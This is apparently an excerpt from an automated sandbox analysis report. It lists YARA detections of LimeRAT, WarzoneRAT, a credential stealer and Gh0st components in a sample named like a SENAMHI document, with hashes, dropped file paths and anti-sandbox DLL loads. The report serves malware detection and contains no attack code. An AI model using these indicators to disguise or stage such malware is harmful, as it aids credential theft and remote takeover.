Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Source: initial sample Static PE information: Filename: DocumentoSENAMHI20222103.exe
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDFA9C 1_2_00BDFA9C
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_029341F8 15_2_029341F8
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02936130 15_2_02936130
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293C958 15_2_0293C958
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02934E10 15_2_02934E10
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293AD00 15_2_0293AD00
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02934540 15_2_02934540
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293ACF5 15_2_0293ACF5
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B941F8 18_2_02B941F8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B96130 18_2_02B96130
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B94E10 18_2_02B94E10
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B94540 18_2_02B94540
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C41F8 19_2_013C41F8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C4E10 19_2_013C4E10
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C4540 19_2_013C4540
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: edgegdi.dll
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe 21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\IconLib.dll 087A0C5F789E964A2FBCB781015D3FC9D1757358BC63BB4E0B863B4DFFDB6E4F
Source: DocumentoSENAMHI20222103.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.53f0000.7.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.chrome.exe.53d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.3.chrome.exe.3e7cd10.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.3.chrome.exe.3e7cd10.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.3.chrome.exe.3e8812f.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.53f0000.7.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.chrome.exe.3e81c45.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.chrome.exe.53d0000.1.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
